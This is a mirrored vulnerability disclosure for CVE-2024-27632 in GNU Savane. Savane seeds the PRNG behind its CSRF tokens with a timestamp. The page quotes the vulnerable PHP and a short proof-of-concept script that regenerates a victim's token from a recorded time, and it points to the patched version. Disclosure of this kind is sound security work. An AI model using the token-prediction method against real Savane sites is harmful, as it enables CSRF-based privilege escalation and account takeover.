Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-27632 PoC — GNU Savane 安全漏洞

Source
https://github.com/ally-petitt/CVE-2024-27632
Associated Vulnerability
Title:GNU Savane 安全漏洞 (CVE-2024-27632)
Description:GNU Savane是美国GNU社区的一套合作软件发展管理系统。 GNU Savane v.3.12及之前版本存在安全漏洞,该漏洞源于允许远程攻击者通过form_header()函数中的form_id升级权限。
Description
CVE-2024–27632 Reference
Readme
# CVE-2024-27632 Vulnerability Details

## Overview

In Savane v3.12 and prior, the Unix timestamp is used as a seed in the Pseudo-Random Number Generator (PRNG) used to generate Cross-Site Request Forgery (CSRF) protection tokens (`form_id`). As a result, an attacker may be able to independently generate the same valid CSRF token that was assigned to a victim user, thereby passing CSRF checks and leading to a successful CSRF attack. The impact of a CSRF attack includes privilege escalation and account takeover.


**CWE Classification:** CWE-335: Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)

**Reported By:** Ally Petitt 

**Affected Product**: Savane

**Affected Versions**: 3.12 and prior

## Technical Details

Before the `form_id` is generated, `utils_srand()` is called. Then, the generated `form_id` is created as an MD5 hash of a value generated by PHP's PRNG.

_frontend/php/include/form.php:61_
```
  if (!$form_id)
    {
      utils_srand ();
      $form_id = md5 (mt_rand (0, 1000000));
    }
```

As shown in the code block below, `utils_srand()` is defined as a function that seeds the `microtime()`, a function that returns the Unix timestamp, multiplied by 1,000,000.

_frontend/php/include/utils.php:969_
```
function utils_srand ()
{
  mt_srand ((int)((double)microtime () * 1000000));
}
```

As a result, the Unix timestamp, a predictable value, is used to generate a security-critical psuedo-random number. The time that a user's token was created can potentially be guessed or triggered by an attacker in order to obtain a valid timestamp that they can use to craft a valid CSRF token.

## Validation Steps
These steps aim to demonstrate that knowing the timestamp is enough to generate a valid token independently. Real-world attack strategies may involve additional creativity in order to ensure that the correct timestamp of the token creation is being deduced.

1. Visit a Savane webpage that generates a `form_id`.
2. Note the Unix timestamp that you visited that page.
3. Replace `$RECORDED_UNIX_TIME` with the time that was recorded and un the following PHP script. Observe that the value generated matches the `form_id` that the server returned upon initially visiting the webpage.

```
<?php
mt_srand ((int)((double)$RECORDED_UNIX_TIME* 1000000));
echo md5 (mt_rand (0, 1000000));
?>
```


## Mitigation

Upgrade to Savane version 3.13 or higher. The patch can be found [here](https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=dee5195d18f9ab16c860e8114819083673f66b95).
File Snapshot

 [4.0K]  /data/pocs/f9019223f0c758102bdaf149301d1236bfc46ec4
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.